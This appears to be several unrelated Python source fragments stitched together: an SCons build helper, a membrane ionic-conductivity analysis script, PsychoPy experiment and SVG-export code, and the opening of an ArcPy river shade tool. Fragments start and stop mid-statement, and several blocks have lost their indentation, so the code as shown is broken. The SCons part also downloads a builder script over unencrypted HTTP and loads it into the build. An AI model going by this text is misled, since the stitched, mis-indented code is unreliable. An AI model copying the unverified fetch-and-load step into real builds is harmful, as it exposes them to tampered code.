    """
    for target in targets:
        name = target.get_builder().get_name(env)
        # membership test instead of the original bare try/except KeyError
        if name not in env['SCB_SCONS_TARGETS']:
            log(12, [
                'creating env[\'SCB_SCONS_TARGETS\'][\'%s\']' % (name)
            ])
            env['SCB_SCONS_TARGETS'][name] = []
        env['SCB_SCONS_TARGETS'][name].append(target)
        log(12, [
            'env[\'SCB_SCONS_TARGETS\'][\'%s\']=%s' % (name, [str(x) for x in env['SCB_SCONS_TARGETS'][name]])
        ])
    if useCallback and env['SCB_PREPARE_CALLBACK']:
        env['SCB_PREPARE_CALLBACK'](env, targets)
def download(url, target = None):
    """Fetch *url* and save it to *target* (defaults to the URL's basename).

    Writes in binary mode so non-text payloads are not corrupted by newline
    translation, and closes both handles even if the transfer fails.
    """
    import urllib
    import contextlib
    if target is None:
        target = url.split('/')[-1]
    # py2 urllib handles lack __enter__, hence contextlib.closing()
    with contextlib.closing(urllib.urlopen(url)) as webFile:
        with open(target, 'wb') as localFile:
            localFile.write(webFile.read())
def buildBaseEnvironment(
buildconfiguration=None,
buildtarget=None
):
env = None
try:
env = allEnvironments[None]
log(10, ['Returning base environment'])
except:
log(10, ['Creating base environment'])
# build a primitive base environment that allows us to select
# the platform based on buildconfiguration and buildtarget
if not buildconfiguration:
buildconfiguration = SCons.Script.GetOption('buildconfiguration'),
if not buildtarget:
buildtarget = SCons.Script.GetOption('buildtarget')
baseenv = SCons.Script.Environment(
SCB_LAUNCH_DIR = SCB_LAUNCH_DIR,
SCB_SCRIPT_DIR = SCB_SCRIPT_DIR,
SCB_BUILD_CONFIGURATION = buildconfiguration,
SCB_BUILD_TARGET = buildtarget,
SCB_VERBOSE=0,
SCB_PLATFORM = SCons.Script.Platform()
)
updateEnvironment(baseenv, SCB_SCRIPT_DIR, ['SCB_PLATFORM'])
url = 'http://www.scons.org/wiki/DoxygenBuilder?action=AttachFile&do=get&target=doxygen.py'
doxygenbuilderfilename = 'SconsBuilderDoxygen.py'
print('checking for ' + doxygenbuilderfilename)
if not os.path.exists(doxygenbuilderfilename):
print('downloading ' + url)
download(
url,
doxygenbuilderfilename
)
print('checking for ' + doxygenbuilderfilename + ' done')
env = SCons.Script.Environment(
tools = ['default', 'SconsBuilderDoxygen'],
toolpath = '.',
SCB_LAUNCH_DIR = SCB_LAUNCH_DIR,
SCB_SCRIPT_DIR = SCB_SCRIPT_DIR,
SCB_BASE_VARIANT_DIR = SconsBuilderConfig.BASE_VARIANT_DIR,
SCB_VARIANT_DIR = '',
SCB_BIN_DIR = None,
SCB_LIB_DIR = None,
SCB_DOC_DIR = SconsBuilderConfig.DOC_DIR,
SCB_ABSOLUTE_PATH = SCB_SCRIPT_DIR,
SCB_RELATIVE_PATH = '',
SCB_BUILD_CONFIGURATION = SCons.Script.GetOption('buildconfiguration'),
SCB_BUILD_TARGET = SCons.Script.GetOption('buildtarget'),
SCB_PREPARE_OBJECT_TARGETS = [prepareObjectTargets],
SCB_PREPARE_LIBRARY_TARGETS = [prepareLibraryTargets],
SCB_PREPARE_EXECUTABLE_TARGETS = [prepareExecutableTargets, prepareUnittestTargets],
SCB_SCONS_TARGETS = {},
SCB_SKIP_DIRS = SconsBuilderConfig.SKIP_DIRS,
SCB_CXX_GLOB = SconsBuilderConfig.CXX_GLOB,
SCB_CXX_SKIP = SCons.Util.CLVar(),
SCB_UNITTEST_ENABLED = SconsBuilderConfig.UNITTEST_ENABLED,
SCB_UNITTEST_DIR_NAME = SconsBuilderConfig.UNITTEST_DIR_NAME,
SCB_UNITTEST_TEST_PREFIX = | |
#! /usr/bin/env python
from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
from builtins import range
from past.utils import old_div
import argparse
from LLC_Membranes.analysis import Atom_props, Diffusivity, Poly_fit
from LLC_Membranes.llclib import physical
import matplotlib.pyplot as plt
import time
import numpy as np
import mdtraj as md
import tqdm
"""
The purpose of this script is to calculate the ionic conductivity of a given LLC membrane using the Nernst Einstein
relation (Method 1) and the Collective Diffusion model (Method 2), the latter being described in the following paper:
<NAME> and <NAME> "Collective diffusion model for ion conduction through microscopic channels," Biophysical Journal,
vol 104, no. 2, pp. 368-376, Jan. 2013.
Ionic conductivity quantifies the movement of ions from site to site through defects in the crystal lattice of
ionic solids or aqueous solutions.
METHOD 1: Nernst Einstein
METHOD 2: Collective Diffusion
To calculate the ionic conductivity, we need to know the current of ions. For current through a channel we define the
current through the channel as:
I = sum ( e_i * v_i / Lc ) (1)
where e and v are the charge and velocity of components i located in the channel. Lc is the channel length defined by
two planes at z1 and z2. Thus Lc = z2 - z1. Equation (1), on average, is the same as the current through the entire
system.
The charge transfer through the channel is defined as:
Q(t) = integral[0, t](I(t)dt) (2)
One can use the equilibrium relation between the mean square displacement of Q and its velocity autocorrelation function
<Q^2(t)> = 2*integral[0, t]dt'(t - t')<I(0)I(t')> (3)
The equilibrium diffusion coefficient of Q, Dq, is given by:
Dq = integral[0, infinity](dt*expected_value(I(0)*I(t))) (4)
Alternatively, we can plot Q(t), find its slope in the linear region and get Dq (much like calculating diffusion
coefficients). Define the change in Q between each time step as:
delta_Q = sum(e_i*delta_z/Lc) (5)
Where we sum over atoms located within the channel region bounded by z_max and z_min. e_i is the charge of atom i.
delta_z is the net displacement of an atom. If an atom exits or enters the boundaries between time steps, delta_z is
taken only as the displacement of the atom within the channel region. For LLC membranes, the channel membrane is taken
as the entire membrane cross section bounded by z_max and z_min since we are looking at bulk properties as opposed to
pure channel conduction. We then cumulate the delta_Qs to construct Q(t). Finding the slope of the linear region will
give the value for Dq. Simulations need to be run for a long time to get accurate values. (LLC systems should be run for
a microsecond or longer to give accurate values)
The steady state current is given by:
I_steady = (Dq * V) / (k_b * T) (6)
Solving for I/V gives the system conductance:
c = Dq / (k_b * T) (7)
This can be used to calculate the ionic conductance with an equilibrium simulation
ALTERNATIVE METHODS:
We can calculate conductance directly from current and voltage if an electric field is applied across the
membrane. To do so, calculate the average current using a time average of equation (1) and the potential difference
across the membrane (which can be found using gmx potential with a careful look at the output .xvg file).
One can also employ the Computational Electrophysiology Module included with GROMACS to create a double layer membrane
system which maintains a concentration gradient across the membrane, inducing a current.
"""
def initialize():
    """Build and parse the command-line arguments for the conductivity
    calculation; returns the argparse namespace."""
    parser = argparse.ArgumentParser(description='Calculate Ionic Conductivity using the Nernst Einstein relation or'
                                                 'the Collective Diffusion Model')

    parser.add_argument('-t', '--traj', default='wiggle.trr', type=str, help='Trajectory file (.xtc or .trr)'
                        'IMPORTANT: Pre-process the trajectory with gmx trjconv -pbc nojump for NE')
    parser.add_argument('-g', '--gro', default='wiggle.gro', type=str, help='Coordinate file')
    parser.add_argument('-d', '--build_mon', default='NAcarb11V', type=str, help='Monomer with which the system was '
                                                                                 'built')
    parser.add_argument('-i', '--ion', default='NA', help='Name of ion(s) being used to calculate ionic conductivity')
    parser.add_argument('-b', '--buffer', default=0, type=float, help='Distance into membrane from min and max where '
                                                                      'current measurements will be made')
    parser.add_argument('-T', '--temp', default=300, type=float, help='System Temperature, Kelvin')
    parser.add_argument('-B', '--nboot', default=200, type=int, help='Number of bootstrap trials to be run')
    # NOTE(review): no type=int here — args.nMC is a str when supplied on the
    # command line (only the default is an int); confirm downstream usage.
    parser.add_argument('-m', '--nMC', default=1000, help='Number of Monte Carlo trials to estimate error in D and Dq')
    parser.add_argument('-S', '--suffix', default='saved',
                        help='Suffix to append to position and id arrays when saving')
    parser.add_argument('-r', '--frontfrac', default=0.16, type=float, help='Where to start fitting line for diffusivity'
                                                                            'calc')
    parser.add_argument('-F', '--fracshow', default=0.5, type=float, help='Percent of graph to show, also where to stop'
                                                                          'fitting line during diffusivity calculation')
    parser.add_argument('--nTsub', default=20, type=int, help='Number of subtrajectories to break into for generating '
                                                              'stats')
    parser.add_argument('-M', '--method', default='NE', help='Which method to use to calculate Ionic Conductivity: CD ='
                                                             'Collective Diffusion, NE = Nernst Einstein, B = both')
    parser.add_argument('-l', '--load', help='Load arrays if they were saved from a previous calculation',
                        action="store_true")
    # NOTE(review): no type=int either — value is a str when supplied; confirm.
    parser.add_argument('--discard', type=int, help='Specify the number of nanoseconds to discard starting'
                                                    'from the beginning of the simulation')
    parser.add_argument('-begin', default=0, type=int, help='Frame to begin using data')
    parser.add_argument('--noshow', action="store_true", help='Specify this to not show any plots')
    parser.add_argument('-a', '--axis', default='xyz', type=str, help='Which axis to compute msd along')

    args = parser.parse_args()

    return args
def nernst_einstein(D, D_std, C, C_std, T):
    """Ionic conductivity via the Nernst-Einstein relation.

    :param D: calculated diffusivity
    :param D_std: error in calculated diffusivity
    :param C: concentration of ions in membrane
    :param C_std: error in concentration
    :param T: temperature simulation is run at, float
    :return: tuple (conductivity, propagated standard error)

    Relies on the module-level constants ``q`` (ion charge, C) and ``kb``
    (Boltzmann constant, J/K) defined in the __main__ block.
    """
    NE_av = q ** 2 * C * D / (kb * T)
    # relative errors added in quadrature; plain '/' is exact here because the
    # file imports true division, so the old_div() wrapper was redundant
    NE_error = NE_av * np.sqrt((D_std / D) ** 2 + (C_std / C) ** 2)

    return NE_av, NE_error
def dQ(frame, positions, channel_length, zmax, zmin, charges, id):
    """Charge displacement through the channel between frame - 1 and frame.

    Each ion's z coordinate is clamped to the channel bounds [zmin, zmax];
    the clamped displacement, weighted by the ion's charge and the elementary
    charge ``e`` (module-level constant), is accumulated and normalised by
    the channel length.
    """
    dq = 0
    for ion in range(positions.shape[1]):
        z_now = positions[frame, ion, 2]        # current z position
        z_before = positions[frame - 1, ion, 2]  # previous z position
        # clamping reproduces the original branch chains: positions inside the
        # channel are kept, positions outside snap to the nearest boundary
        z_now_clamped = min(max(z_now, zmin), zmax)
        z_before_clamped = min(max(z_before, zmin), zmax)
        displacement = z_now_clamped - z_before_clamped
        dq += e * (charges[id[ion]]) * displacement / channel_length

    return dq
def dQ2(z, zmax, zmin, charges, id):
    """
    Calculate the displacement of all positions from frame to frame

    :param z: trajectory of positions [nframes, npoints, 1] --> z-direction only
    :return: a trajectory n(t) describing the delta n at each time step
    """
    flux = np.zeros(z.shape[0])
    for frame in tqdm.tqdm(range(1, flux.shape[0])):
        for ion in range(z.shape[1]):
            now = z[frame, ion]
            before = z[frame - 1, ion]
            weight = charges[id[ion]]
            # only motion within (or across a boundary of) the channel counts
            if zmin <= now <= zmax:
                if zmin <= before <= zmax:
                    flux[frame] += (now - before) * weight
                elif before > zmax:
                    flux[frame] += (now - zmax) * weight
                elif before < zmin:
                    flux[frame] += (now - zmin) * weight
            elif now > zmax:
                if zmin <= before <= zmax:
                    flux[frame] += (zmax - before) * weight
            elif now < zmin:
                if zmin <= before <= zmax:
                    flux[frame] += (zmin - before) * weight
    # scale by elementary charge (module constant e) over channel length
    flux *= (e / (zmax - zmin))

    return flux
if __name__ == '__main__':
start = time.time()
args = initialize()
# Constants
kb = 1.38 * 10 ** -23 # Boltzmann constant [=] J/K
e = 1.602 * 10 ** -19 # elementary charge (C)
q = Atom_props.charge[args.ion] * e # elementary charge (1.602e-19 C) * charge of ion
frontfrac = args.frontfrac
fracshow = args.fracshow
d = len(args.axis) # number of dimensions in which msd is being computed
ndx = []
if 'x' in args.axis:
ndx.append(0)
if 'y' in args.axis:
ndx.append(1)
if 'z' in args.axis:
ndx.append(2)
t = md.load(args.traj, top=args.gro)[args.begin:]
keep = [a.index for a in t.topology.atoms if a.name == | |
self.all_keys += [(self.this_trial['autoresp'], self.this_trial['autort'])]
self.post_trial()
# correct timing if autorun
if self.rp['autorun'] > 0:
try:
self.this_trial['autort'] *= self.rp['autorun']
self.this_trial['rt'] *= self.rp['autorun']
except: # maybe not all keys are present
pass
self.this_trial['onset'] *= self.rp['autorun']
self.this_trial['dur'] *= self.rp['autorun']
self.datafile.write_header(self.info.keys() + self.this_trial.keys())
self.datafile.write(self.info.values() + self.this_trial.values())
self.cumtime += self.this_trial['dur']
# update exp_plan with new values
try:
self.exp_plan[self.trialmap[self.thisIndex]] = self.this_trial
except: # for staircase
self.exp_plan.append(self.this_trial)
def after_trial(self):
"""Alias to :func:`~psychopy_ext.exp.Task.post_trial()`
"""
self.post_trial()
def post_trial(self):
"""A default function what to do after a trial is over.
It records the participant's response as the last key pressed,
calculates accuracy based on the expected (correct) response value,
and records the time of the last key press with respect to the onset
of a trial. If no key was pressed, participant's response and response
time are recorded as an empty string, while accuracy is assigned a
'No response'.
:Args:
- this_trial (dict)
A dictionary of trial properties
- all_keys (list of tuples)
A list of tuples with the name of the pressed key and the time
of the key press.
:Returns:
this_trial with ``subj_resp``, ``accuracy``, and ``rt`` filled in.
"""
if len(self.all_keys) > 0:
this_resp = self.all_keys.pop()
if hasattr(self, 'respmap'):
subj_resp = this_resp[2]
else:
subj_resp = self.computer.valid_responses[this_resp[0]]
self.this_trial['subj_resp'] = subj_resp
try:
acc = signal_det(self.this_trial['corr_resp'], subj_resp)
except:
pass
else:
self.this_trial['accuracy'] = acc
self.this_trial['rt'] = this_resp[1]
else:
self.this_trial['subj_resp'] = ''
try:
acc = signal_det(self.this_trial['corr_resp'], self.this_trial['subj_resp'])
except:
pass
else:
self.this_trial['accuracy'] = acc
self.this_trial['rt'] = ''
def run_event(self):
"""Presents a trial and catches key presses.
"""
# go over each event in a trial
self.event_clock.reset()
self.mouse.clickReset()
# show stimuli
event_keys = self.this_event.func()
if isinstance(event_keys, tuple):
event_keys = [event_keys]
elif event_keys is None:
event_keys = []
if len(event_keys) > 0:
self.all_keys += event_keys
# this is to get keys if we did not do that during trial
self.all_keys += self.last_keypress(
keyList=self.computer.valid_responses.keys(),
timeStamped=self.trial_clock)
#if self.this_event.rectime:
#if len(self.win.frameIntervals) > 0:
#self.rectimes.append(self.win.frameIntervals[-1])
#self.win.frameIntervals = []
    def get_behav_df(self, pattern='%s'):
        """
        Extracts data from files for data analysis.

        :Kwargs:
            pattern (str, default: '%s')
                A string with formatter information. Usually it contains a path
                to where data is and a formatter such as '%s' to indicate where
                participant ID should be incorporated.

        :Returns:
            A `pandas.DataFrame` of data for the requested participants.
        """
        # Delegates to the module-level get_behav_df() function (this method
        # shadows that name inside the class namespace).
        return get_behav_df(self.info['subjid'], pattern=pattern)
class SVG(object):
    """Exports PsychoPy visual stimuli into an SVG vector drawing (svgwrite).

    Positions and sizes are converted from the stimulus' units into pixels;
    the SVG origin is the window's top-left corner with the y-axis pointing
    down, hence the sign flips in :meth:`get_pos`.
    """

    def __init__(self, win, filename='image'):
        """Bind the PsychoPy window *win* and open a drawing at *filename*."""
        if no_svg:
            raise ImportError("Module 'svgwrite' not found.")
        # NOTE(review): contrast is forced to 1, presumably so the colour
        # conversion in color2rgb255() is exact — confirm side effects on win
        win.contrast = 1
        self.win = win
        self.aspect = self.win.size[0]/float(self.win.size[1])
        self.open(filename)

    def open(self, filename):
        """Create the SVG drawing sized to the window, plus a background rect
        painted with the window's colour."""
        filename = filename.split('.svg')[0]
        self.svgfile = svgwrite.Drawing(profile='tiny',filename='%s.svg' % filename,
                        size=('%dpx' % self.win.size[0],
                              '%dpx' % self.win.size[1]),
                        # set default units to px; from http://stackoverflow.com/a/13008664
                        viewBox=('%d %d %d %d' %
                                    (0,0,
                                     self.win.size[0],
                                     self.win.size[1]))
                        )
        bkgr = self.svgfile.rect(insert=(0,0), size=('100%','100%'),
                                 fill=self.color2rgb255(self.win))
        self.svgfile.add(bkgr)

    def save(self):
        """Write the accumulated drawing to disk."""
        self.svgfile.save()

    def color2attr(self, stim, attr, color='black', colorSpace=None, kwargs=None):
        """Fill *kwargs* with the SVG attribute *attr* (e.g. 'stroke', 'fill')
        for the given colour, or with zero opacity when the colour is unset."""
        if kwargs is None: kwargs = {}
        col = self.color2rgb255(stim, color=color, colorSpace=colorSpace)
        if col is None:
            kwargs[attr + '_opacity'] = 0
        else:
            kwargs[attr] = col
            kwargs[attr + '_opacity'] = 1
        return kwargs

    def write(self, stim):
        """Convert a single PsychoPy stimulus to SVG and add it to the drawing.

        Raises NotImplementedError for stimulus types without a conversion;
        unknown types must provide a ``to_svg(self)`` hook.
        """
        if 'Circle' in str(stim):
            color_kw = self.color2attr(stim, 'stroke', color=stim.lineColor,
                                       colorSpace=stim.lineColorSpace)
            color_kw = self.color2attr(stim, 'fill', color=stim.fillColor,
                                       colorSpace=stim.fillColorSpace,
                                       kwargs=color_kw)
            svgstim = self.svgfile.circle(
                            center=self.get_pos(stim),
                            r=self.get_size(stim, stim.radius),
                            stroke_width=stim.lineWidth,
                            opacity=stim.opacity,
                            **color_kw
                            )
        elif 'ImageStim' in str(stim):
            # bug fix: was "raise NotImplemented" (not an exception class)
            raise NotImplementedError
        elif 'Line' in str(stim):
            color_kw = self.color2attr(stim, 'stroke', color=stim.lineColor,
                                       colorSpace=stim.lineColorSpace)
            svgstim = self.svgfile.line(
                            start=self.get_pos(stim, stim.start),
                            end=self.get_pos(stim, stim.end),
                            stroke_width=stim.lineWidth,
                            opacity=stim.opacity,
                            **color_kw
                            )
        elif 'Polygon' in str(stim):
            # polygon export not implemented yet
            raise NotImplementedError
        elif 'Rect' in str(stim):
            color_kw = self.color2attr(stim, 'stroke', color=stim.lineColor,
                                       colorSpace=stim.lineColorSpace)
            color_kw = self.color2attr(stim, 'fill', color=stim.fillColor,
                                       colorSpace=stim.fillColorSpace,
                                       kwargs=color_kw)
            svgstim = self.svgfile.rect(
                            insert=self.get_pos(stim, offset=(-stim.width/2., -stim.height/2.)),
                            size=(self.get_size(stim, stim.width), self.get_size(stim, stim.height)),
                            stroke_width=stim.lineWidth,
                            opacity=stim.opacity,
                            **color_kw
                            )
        elif 'ThickShapeStim' in str(stim):
            # must be tested before 'ShapeStim': that string is a substring
            svgstim = stim.to_svg(self)
        elif 'ShapeStim' in str(stim):
            points = self._calc_attr(stim, np.array(stim.vertices))
            points[:, 1] *= -1  # SVG y-axis points down
            color_kw = self.color2attr(stim, 'stroke', color=stim.lineColor,
                                       colorSpace=stim.lineColorSpace)
            color_kw = self.color2attr(stim, 'fill', color=stim.fillColor,
                                       colorSpace=stim.fillColorSpace,
                                       kwargs=color_kw)
            if stim.closeShape:
                svgstim = self.svgfile.polygon(
                                points=points,
                                stroke_width=stim.lineWidth,
                                opacity=stim.opacity,
                                **color_kw
                                )
            else:
                svgstim = self.svgfile.polyline(
                                points=points,
                                stroke_width=stim.lineWidth,
                                opacity=stim.opacity,
                                **color_kw
                                )
            tr = self.get_pos(stim)
            svgstim.translate(tr[0], tr[1])
        elif 'SimpleImageStim' in str(stim):
            raise NotImplementedError
        elif 'TextStim' in str(stim):
            if stim.font == '':
                font = 'arial'
            else:
                font = stim.font
            svgstim = self.svgfile.text(text=stim.text,
                            insert=self.get_pos(stim) + np.array([0,stim.height/2.]),
                            fill=self.color2rgb255(stim),
                            font_family=font,
                            font_size=self._calc_attr(stim, stim.height),
                            text_anchor='middle',
                            opacity=stim.opacity
                            )
        else:
            svgstim = stim.to_svg(self)

        if not isinstance(svgstim, list):
            svgstim = [svgstim]
        for st in svgstim:
            self.svgfile.add(st)

    def get_pos(self, stim, pos=None, offset=None):
        """Return *pos* (default: the stimulus position) in SVG pixel
        coordinates, optionally shifted by *offset* (in stimulus units)."""
        if pos is None:
            pos = stim.pos
        if offset is not None:
            offset = self._calc_attr(stim, np.array(offset))
        else:
            offset = np.array([0,0])
        pos = self._calc_attr(stim, pos)
        pos = self.win.size/2 + np.array([pos[0], -pos[1]]) + offset
        return pos

    def get_size(self, stim, size=None):
        """Return *size* (default: the stimulus size) converted to pixels."""
        if size is None:
            size = stim.size
        size = self._calc_attr(stim, size)
        return size

    def _calc_attr(self, stim, attr):
        """Convert a scalar or (x, y) pair from the stimulus' units to pixels."""
        if stim.units == 'height':
            try:
                len(attr)  # sequences pass; scalars raise TypeError
            except TypeError:
                out = (attr * stim.win.size[1])
            else:
                out = (attr * stim.win.size * np.array([1./self.aspect, 1]))
        elif stim.units == 'norm':
            try:
                len(attr)
            except TypeError:
                out = (attr * stim.win.size[1]/2)
            else:
                out = (attr * stim.win.size/2)
        elif stim.units == 'pix':
            out = attr
        elif stim.units == 'cm':
            out = misc.cm2pix(attr, stim.win.monitor)
        elif stim.units in ['deg', 'degs']:
            out = misc.deg2pix(attr, stim.win.monitor)
        else:
            raise NotImplementedError
        return out

    def color2rgb255(self, stim, color=None, colorSpace=None):
        """
        Convert color to RGB255 while adding contrast
        #Requires self.color, self.colorSpace and self.contrast
        Modified from psychopy.visual.BaseVisualStim._getDesiredRGB

        Returns an 'rgb(r,g,b)' string, a named colour, or None when the
        colour cannot be converted.
        """
        if color is None:
            color = stim.color
        if isinstance(color, str) and stim.contrast == 1:
            color = color.lower()  # keep the nice name
        else:
            # Ensure that we work on 0-centered color (to make negative contrast values work)
            if colorSpace is None:
                colorSpace = stim.colorSpace
            if colorSpace not in ['rgb', 'dkl', 'lms', 'hsv']:
                color = (color / 255.0) * 2 - 1

            # Convert to RGB in range 0:1 and scaled for contrast
            # although the shader then has to convert it back it gets clamped en route otherwise
            try:
                color = (color * stim.contrast + 1) / 2.0 * 255
                color = 'rgb(%d,%d,%d)' % (color[0],color[1],color[2])
            except Exception:  # e.g. unset colour (None) — signal "no colour"
                color = None
        return color
class Datafile(object):
    def __init__(self, filename, writeable=True, header=None):
        """
        A convenience class for managing data files.

        Output is recorded in a comma-separated (csv) file.

        .. note:: In the output file, floats are formatted to 1 ms precision so
                  that output files are nice.

        :Args:
            filename (str)
                Path to the file name
        :Kwargs:
            - writeable (bool, default: True)
                Can data be written in file or not. Might seem a bit silly
                but it is actually very useful because you can create
                a file and tell it to write data without thinking
                whether `no_output` is set.
            - header (list, default: None)
                If you give a header, then it will already be written
                in the datafile. Usually it's better to wait and write
                it only when the first data line is available.
        """
        self.filename = filename
        self.writeable = writeable
        # guards against writing the header line more than once
        self._header_written = False
        if header is not None:
            self.write_header(header)
        else:
            self.header = header
def open(self):
"""Opens a csv file for writing data
"""
if self.writeable:
try_makedirs(os.path.dirname(self.filename))
try:
self.dfile = open(self.filename, 'ab')
self.datawriter = csv.writer(self.dfile, lineterminator = '\n')
except IOError:
raise IOError('Cannot write to the data file %s!' % self.filename)
def close(self):
"""Closes the file
"""
if self.writeable:
self.dfile.close()
def write(self, data):
"""
Writes data list to a file.
.. note:: In the output file, floats are formatted to 1 ms precision so
that output files are nice.
:Args:
data (list)
A list of values to write in a datafile
"""
if self.writeable:
# cut down floats to 1 ms precision
dataf = ['%.3f'%i if isinstance(i,float) else i for i in data]
self.datawriter.writerow(dataf)
def write_header(self, header):
"""Determines if a header should be writen in a csv data file.
Works by reading the first line and comparing it to the given header.
If the header already is present, then a new one is not written.
:Args:
header (list of str)
A list of column names
"""
self.header = header
if self.writeable and not self._header_written:
write_head = False
# no header needed if the file already exists and has one
try:
| |
# <gh_stars>0  (repository-scraper artifact; commented out so the file parses)
#******************************************************************************************************
# Name: River shade adjustment tool - part 1
# Created: 1/25/2021
# Updated: 2/26/2021
# Author: <NAME>
#
# Summary: This is the current-conditions shade adjustment tool referenced in the MS thesis
# "Lidar-based riparian forest assessment of the Nooksack River, Washington" by
# <NAME>, Western Washington University, Bellingham, Washington.
# For details on how to use this script, see the thesis report available at:
# https://cedar.wwu.edu
#
# Description: For the inundated area of the river, this script determines which direction the shade
# is coming from, calculates the mean leaf area index for the bank casting the shadows,
# and then estimates the proportion of sunlight that would reach the water surface
# based on the modeled transmissivity of the vegetation.
#
# The output is a series of partially overlapping tif rasters in the GoodOutputs folder
# and shapefiles in the ErrorOutputs folder. The files in the GoodOutputs folder should
# be merged together into a single raster, with the "mean" option for the overlapping
# areas. The ErrorOutputs file contains the sub-reaches that the script was unable to
# process for some reason (usually related to complex geometry, which is a problem in
#                  braided channel areas). I would recommend merging the GoodOutputs first, then filling in
# any significant holes by hand (i.e. look at the leaf area index of the bank casting the
# deepest shadows, use the equation given in this script to calculate the transmissivity
# of the canopy, and assign this value to the missing data area). Do this in the GUI.
#
# If you just want to add nodata values to all the Error areas, you can do this easily by
# adding a new field to the inundated area polygon ("RiverArea") with the nodata value,
# converting the inundated area polygon to raster, and then using the Mosaic to New Raster
# tool to combine it with the other rasters. Use the Mosaic Operator parameter to specify
#                  that the error values should only be copied if there is nothing in the canopy
# transmissivity layer (with the good values).
#
# Once you are satisfied with the coverage of the canopy transmissivity layer, save it as
# "canopy_transmissivity" in the GDB (snap the cells to the "DTM_minus_DSM" layer)and run
#                  "canopy_transmissivity" in the GDB (snap the cells to the "DTM_minus_DSM" layer) and run
#
# Limitations and appropriate use: This script is intended to be used on watershed-scale
# analyses where a more detailed manual approach would be cost-prohibitive. If you are
# only working with one or two reaches, it is probably better to assign transmissivity
# modifiers by hand. This script is most likely to mis-calculate transmissivity or give
# error values for sub-reaches with a north/south orientation and on sub-reaches that are
# very curved (U-shaped) relative to their width (usually these are short side channels).
#
# ArcPy error management: Occasionally this script throws the ArcPy Error 99999: "Table
# already exists, Spatial reference not found" error. I believe this is related to a
# problem with the automatic overwrite of partial files stored in the AppData temp folder.
# If this happens, rename the output of the line throwing the error (for example,
# in line 123, you would change >>DSM_clipped = "DSM_clipped_to_river"<< to
# >>DSM_clipped = "DSM_clipped_to_river1"<<). This will not affect any meaningful
# outputs of the script.
#
# This script runs in Python 3.6 and requires an Esri Advanced license level.
#*****************************************************************************************************
### Settings: ###
# import modules for the error catcher
import sys, string, os,traceback, datetime
# import module for arcpy
import arcpy
from arcpy.sa import *
from arcpy import env
# Allow geoprocessing tools to overwrite existing outputs (intermediate
# layers are regenerated on every run).
arcpy.env.overwriteOutput = True
# Parallel processing: use 50% of the cores on the machine
arcpy.env.parallelProcessingFactor = "50%"
# Set the workspace environment to local file geodatabase
# This contains the input files and will also contain intermediate outputs (which can be useful
# for troubleshooting).
env.workspace = r"C:\ShadeModelCorrector\ShadeModelHome.gdb"
# Time stamp for this run.
# NOTE: this was previously assigned twice (before and after the workspace
# setup); the redundant first assignment has been removed.
RightNow = datetime.datetime.now()
#*****************************************************************************************************
try:
#*********************************************************************************************
### Setup: ###
print("SETUP:")
# Set the location of the two folders that will contain the output
GoodOutputs = r"C:\ShadeModelCorrector\GoodOutputs"
ErrorOutputs = r"C:\ShadeModelCorrector\ErrorOutputs"
# Read in files:
# DSM shade model (raster), representing total solar energy per square meter, calculated from
# a canopy surface model raster representing terrain + vegetation.
# (Shade models were created with the Area Solar Radiation (Spatial Analyst) tool)
DSM = "Daily_AreaSol_DSM_Demo"
print("DSM set")
# DTM shade model (raster)
# (Calculated from a digital terrain raster, no vegetation).
DTM = "Daily_AreaSol_DTM_Demo"
print("DTM set")
# River area polygon, representing total inundated area (polygon)
inundated_area = "RiverArea_Demo"
print("river area set")
# River area centerlines (line)
# (River area centerlines can be generated using the Polygon to Centerline (Topographic
# Production Tools) tool on the river area polygon).
# NOTE: this layer must have a "ScriptID" field with unique IDs
river_center = "RiverArea_Centerline_Demo"
print("river centerlines set")
#Leaf area index raster, calculated from lidar using methods from Richardson, Moskal, and Kim (2009)
#This raster's native resolution is 30-meters, but it has been resampled to 1-meter to facilitate processing
# in this script
LAI = "effectiveLAI_Demo"
print("leaf area index set")
# Read in the shade aspect raster (calculated by running the "Aspect" tool on the DSM raster
shade_aspect = "Aspect_ofShade_Demo"
#**********************************************************************************************
### Preliminary steps: ###
print("")
print("PRELIMINARY STEPS:")
# Create raster representing proportion of light that can reach the ground through the vegetation
# (Calculated based on leaf area index and Beer's Law; see Richardson, Moskal, and Kim (2009)
# intensity below / intensity above = e^(-k*L); k = extinction coefficient, L = leaf area index
minusK = -0.47687
# proportion of light that penetrates canopy = e^(-0.47687)*LAI
# So...
outTimes = Times(LAI, minusK)
actual_proportion = Exp(outTimes)
actual_proportion.save("actual_proportion")
actual_proportion = "actual_proportion"
print("Beer's law light proportion raster created")
# Clip the DTM and DSM to the inundated area
DSM_clipped = "DSM_clipped_to_river1"
DSM_clipped = arcpy.Clip_management(DSM, "", DSM_clipped, inundated_area, "-9999", "ClippingGeometry",
"NO_MAINTAIN_EXTENT")
print("DSM clipped")
DTM_clipped = "DTM_clipped_to_river"
DTM_clipped = arcpy.Clip_management(DTM, "", DTM_clipped, inundated_area, "-9999", "ClippingGeometry",
"NO_MAINTAIN_EXTENT")
print("DTM clipped")
# Subtract the clipped DSM from the DTM to get the amount by which solar energy would be
# reduced if the vegetation was 100% occlusive
veg_diff_raw = Minus(DTM_clipped, DSM_clipped)
print("raw difference of DTM and DSM computed...")
# Use the Con tool to clean up the veg_difference layer, changing all values below 0
# to 0 (cleaning up noise from run-to-run variability)
veg_diff = Con(veg_diff_raw >= 0, veg_diff_raw, 0)
print("Vegetation raster complete.")
# Determine the angle of the shade gradient (to determine where the shadow is coming from)
shade_aspect = Int(shade_aspect)
print("Aspect values converted to integer")
# Convert the river area polygon to a polyline feature (necessary for later processing)
river_area_lines = "RiverArea_PolygonToLine"
arcpy.FeatureToLine_management(inundated_area, river_area_lines)
print("River area polycon converted to lines")
# Use the Linear Directional Mean tool to determine the mean direction of the centerline segments
foo = "centerline_direction"
linearDirectMean = arcpy.DirectionalMean_stats(river_center, foo, "DIRECTION", Case_Field="ScriptID")
linearDirectMean = foo
print("Finished calculating mean direction of stream segments.")
#**********************************************************************************************
### Pair each stream segment with the appropriate leaf area index modifier: ###
print("")
print("PAIRING BANK CONDITIONS TO SHADE AREAS:")
print("(Expect this section to take approximately 45-60 seconds per stream segment...)")
# For each line segment in centerline_segments... (n = 2994), output = selected_centerline
cursor = arcpy.da.SearchCursor(river_center,'ScriptID')
for row in cursor:
puppy = row[0]
print("")
# select the segment
expression = ('"ScriptID" = {}'.format(puppy))
river_center_select = arcpy.SelectLayerByAttribute_management(river_center, 'NEW_SELECTION', expression)
myoutput = "subsetx"
arcpy.CopyFeatures_management(river_center_select, myoutput)
